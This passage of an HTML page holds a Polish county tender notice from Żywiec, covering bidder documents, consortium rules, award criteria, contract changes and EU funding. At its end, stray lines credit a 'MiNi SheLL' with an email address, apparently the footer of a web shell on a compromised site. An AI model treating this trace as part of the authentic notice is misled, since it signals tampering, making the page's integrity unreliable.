<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie złożonego oświadczenia. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy na druku stanowiącym Załącznik Nr 2 do Specyfikacji, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.	Pozostałe dokumenty, które Wykonawca jest zobowiązany złożyć wraz z ofertą:
1)	wypełniony Formularz ofertowy (Zał. Nr 1 do Specyfikacji), zawierający m. in.: 
a)	oświadczenie o przyjęciu:  terminu płatności i terminu związania ofertą,
b)	oświadczenie o udzieleniu gwarancji oraz rękojmi na wykonany przedmiot zamówienia;
2)	oświadczenie zawierające listę podmiotów należących do tej samej grupy kapitałowej co Wykonawca, bądź informację, iż Wykonawca nie należy do grupy kapitałowej (Zał. nr 7 do Specyfikacji).
3)	w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wykonawców w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
4)	pełnomocnictwo udzielane osobom podpisującym dokumenty ofertowe, o ile prawo do reprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych - postanowienie niniejsze stosuje się odpowiednio do reprezentowania wykonawcy powołanego i funkcjonującego na podstawie przepisów ustaw.
4.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być udzielone przez wszystkich wykonawców wchodzących w skład konsorcjum oraz zostać przedłożone w oryginale lub kopii poświadczonej notarialnie.
5.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt 2) - 4) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju, miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. Data wystawienia dokumentu zawierającego w/w oświadczenie winna odpowiadać datom określonym odpowiednio w pkt a) i b).
6.	W przypadku, gdy złożona przez wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości, co do jej prawdziwości, zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.
7.	Dokumenty i oświadczenia sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski.
8.	W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, spółka cywilna) dokumenty, o których mowa w pkt. V.2 SIWZ oraz V 3.2 SIWZ winny zostać przedłożone odrębnie w odniesieniu do każdego z wykonawców.
9.	W przypadku wykonawców ubiegających się o udzielenie zamówienia w ramach spółki cywilnej dokumenty, o których mowa w pkt. V ppkt. 2. 3) i 4) SIWZ winny zostać przedłożone odrębnie w odniesieniu do spółki cywilnej oraz odrębnie w odniesieniu do jej wspólników.
10.	W przypadku wykonawców wspólnie ubiegających się o zamówienie (konsorcjum, spółka cywilna), warunki wynikające z art. 22 ust. 1 ustawy muszą być spełnione łącznie przez wszystkich wykonawców (działających w ramach konsorcjum lub spółki cywilnej) ubiegających się o udzielenie zamówienia. Złożone przez Wykonawców ubiegających się o zamówienie oświadczenia, o których mowa wyżej powinny potwierdzać spełnianie warunków wynikających z art. 22 ust. 1 pkt 1 - 4 Pzp.
11.	Dokumenty, o których mowa wyżej, należy przedłożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę lub osobę upoważnioną do składania oświadczeń woli w imieniu wykonawcy, z tym, że pełnomocnictwo udzielone osobie reprezentującej wykonawcę składane przez Wykonawcę powinno być złożone w oryginale lub kopii poświadczonej notarialnie - z zastrzeżeniem kolejnego punktu.
12.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach, których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
13.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Treść dokumentów potwierdzających udostępnienie zasobów podmiotów trzecich powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania podmiotu trzeciego, określać, czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie ono wykonane, w tym, jakiego okresu dotyczy, a także być powiązana ze  złożonym przez Wykonawcę w Formularzu ofertowym oświadczeniem dotyczącym udziału podwykonawców w realizacji zamówienia.
14.	W przypadku, gdy złożone przez wykonawców dokumenty, oświadczenia dotyczące warunków udziału w postępowaniu zawierają dane/informacje w innych walutach niż określono to w niniejszej specyfikacji, Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia wszczęcia postępowania. Jeżeli w dniu wszczęcia postępowania nie będzie opublikowany średni kurs walut przez NBP, Zamawiający przyjmie kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem wszczęcia postępowania o zamówieniu.
Kursy walut dostępne są pod następującym adresem internetowym:
http://www.nbp.pl/home.aspx?f=/kursy/kursy_archiwum.html
Zamawiający będzie korzystał z Archiwum kursów średnich - tabela A.
http://www.nbp.pl/home.aspx?c=/ascx/archa.ascx.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania wstępnego kosztorysu realizacji inwestycji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej pod rygorem nieważności.
2.	Strony postanawiają, iż dokonają w formie pisemnego aneksu zmiany wynagrodzenia w wypadku wystąpienia którejkolwiek ze zmian przepisów wskazanych w art. 142 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, tj. zmiany:
a)	stawki podatku od towarów i usług,
b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
d)	W przypadku określonym w ust 9.
- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
3.	Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia podpisania aneksu, o którym mowa w ust. 2.
4.	W wypadku zmiany, o której mowa w ust. 2 lit. a) wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.
5.	W przypadku zmiany, o której mowa w ust. 2 lit. b) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości zmienionego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia.
6.	W przypadku zmiany, o którym mowa w ust. 2 lit. c) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.
7.	Za wyjątkiem sytuacji o której mowa w ust. 2 lit. a), wprowadzenie zmian wysokości wynagrodzenia wymaga uprzedniego wykazania przez Wykonawcę dowodami z dokumentów wysokości dodatkowych koszów wynikających z wprowadzenia zmian, o których mowa w ust. 3 litera b) i c).
8.	Zamawiający zobowiązuje się do dokonania analizy dokumentów, o których mowa w ust. 7 w terminie 7 dni od ich przedłożenia przez Wykonawcę. Aneks zostanie podpisany w terminie uzgodnionym przez obie strony, przy czym termin ten będzie przypadał w okresie nie dłuższym niż 21 dni od daty przedłożenia dokumentów przez Wykonawcę.
9.	Strony dopuszczają możliwość zmiany zawartej umowy w przypadkach, gdy zmiany te nie będą niekorzystne dla Zamawiającego lub konieczność wprowadzenia zmian wynikać będzie z okoliczności, których strony przy zachowaniu wymaganej staranności przewidzieć nie mogły w chwili zawarcia umowy, w szczególności zmian w zakresie sieci szkół ponadgimnazjalnych objętych niniejszą umową.
10.	Zamawiający przewiduje możliwość zmiany treści umowy w zakresie zmiany wymagań co do przedmiotu zamówienia, z uwagi  na ewentualne nieprzewidziane zmiany wytycznych, zmian regulaminu i instrukcji Instytucji Zarządzającej RPO WSL 2014-2020. Zamawiający dopuszcza również zmianę terminu wykonania przedmiotu zamówienia lub jego części, jeżeli ww. zmiany Wytycznych uniemożliwią Wykonawcy realizację przedmiotu zamówienia lub jego części w terminie określonym w §6 umowy.
11.	Zamawiający dopuszcza możliwość przedłużenia terminu wykonania umowy lub jego części ze względu na przedłużające się procedury administracyjne, niewynikające z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zywiec.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żywcu
Zespół ds. Zamówień Publicznych
ul. Krasińskiego 13
34-300 Żywiec
pok. nr 38 - II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2016 godzina 09:00, miejsce: Starostwo Powiatowe w Żywcu
ul. Krasińskiego 13
34-300 Żywiec
parter - Biuro Informacji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest realizowany w ramach zadania Modernizacja infrastruktury edukacyjnej wspierająca dostosowanie do lokalnego rynku pracy, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego i Rozszerzenie oferty edukacyjnej w celu dostosowanie do potrzeb lokalnego rynku pracy współfinansowanego ze środków Europejskiego Funduszu Społecznego - RPO WSL  2014-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com